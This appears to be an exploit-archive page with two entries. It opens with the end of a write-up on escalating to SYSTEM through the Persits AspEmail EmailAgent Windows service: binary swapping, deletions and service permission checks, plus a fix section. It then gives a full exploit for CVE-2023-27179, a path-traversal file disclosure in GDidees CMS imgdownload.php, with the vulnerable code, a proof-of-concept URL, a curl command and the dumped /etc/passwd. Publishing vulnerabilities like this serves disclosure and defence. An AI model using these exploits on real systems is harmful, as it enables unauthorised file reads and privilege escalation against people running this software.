C:\Windows\Temp\Export.txt # cd C:\Program Files (x86)\Persits Software\AspEmail\Bin # del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe # cd c:\Windows\Tasks # del Run.bat & del Mail.exe # # # # #################################################################################################################### # # [+]Trigger Successful![+] # # [+] C:\PenTest>systeminfo | findstr "Boot Time" # System Boot Time: 13.04.2022, 07:46:06 # # # # #################################################################################################################### #[Export.txt]# # #################################################################################################################### # # # NT AUTHORITY\SYSTEM # # # # #################################################################################################################### # # # ================================================================================================================== # ...|||[FIX]|||... # # ================================================================================================================== # [+] C:\>Runas /profile /user:DeepSecLab\Administrator CMD [+] # # =================================================================================================================# [+] C:\Administrator>sc qc "Persits Software EmailAgent" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Persits Software EmailAgent TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Persits Software EmailAgent DEPENDENCIES : rpcss SERVICE_START_NAME : LocalSystem # ================================================================================================================== [+] C:\Administrator>sc sdshow "Persits Software EmailAgent" D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) # ================================================================================================================== [+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula Accesschk v6.15 - Reports effective permissions for securable objects Copyright (C) 2006-2022 Mark Russinovich Sysinternals - www.sysinternals.com Persits Software EmailAgent Medium Mandatory Level (Default) [No-Write-Up] RW NT AUTHORITY\SYSTEM SERVICE_ALL_ACCESS RW BUILTIN\Administrators SERVICE_ALL_ACCESS # ================================================================================================================== [+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" Successfully processed 0 files; Failed processing 1 files C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied. DONE! # ================================================================================================================== [+] C:\Administrator>sc stop "Persits Software EmailAgent" [+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent" * These commands are optional. Used to stop the "Persits Software EmailAgent" service. We fixed the vulnerability and I don't think it's necessary anymore. # ================================================================================================================== </code></pre>

<pre><code># Exploit Title: GDidees CMS - 'imgdownload.php' Local File Disclosure # Date : 03/27/2023 # Exploit Author : Hadi Mene # Vendor Homepage : https://www.gdidees.eu/ # Software Link : https://www.gdidees.eu/cms-1-0.html # Version : 3.9.1 and earlier # Tested on : Debian 11 # CVE : CVE-2023-27179 ### Summary: GDidees CMS v3.9.1 and lower versions was discovered to contain an local file disclosure vulnerability via the filename parameter at /_admin/imgdownload.php. ### Description : Imgdownload.php is mainly used by the QR code generation module to download an QR code. The vulnerability occurs in line 4 where the filename parameter which will be opened later is not filtered or sanitized. Furthermore, there is no admin session check in this code as it should since only the admin user should normally be able to download QR code. Vulnerable Code : 3. if (isset($_GET["filename"])) { 4. $filename=$_GET["filename"]; ..... ..... 27. @readfile($filename) OR die(); ### POC : URL : https://[GDIDEESROOT]/_admin/imgdownload.php?filename=../../../../../../etc/passwd Exploitation using curl # curl http://192.168.0.32/cmsgdidees3.9.1-mysqli/_admin/imgdownload.php?filename=../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin ntp:x:104:110::/nonexistent:/usr/sbin/nologin messagebus:x:105:111::/nonexistent:/usr/sbin/nologin uuidd:x:106:112::/run/uuidd:/usr/sbin/nologin pulse:x:107:115:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin lightdm:x:108:117:Light Display Manager:/var/lib/lightdm:/bin/false hadi:x:1000:1000:hadi,,,:/home/hadi:/bin/bash systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin vboxadd:x:998:1::/var/run/vboxadd:/bin/false openldap:x:109:118:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false sshd:x:110:65534::/run/sshd:/usr/sbin/nologin mysql:x:111:120:MySQL Server,,,:/nonexistent:/bin/false ### References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27179 https://nvd.nist.gov/vuln/detail/CVE-2023-27179 https://www.exploit-db.com/papers/12883 </code></pre>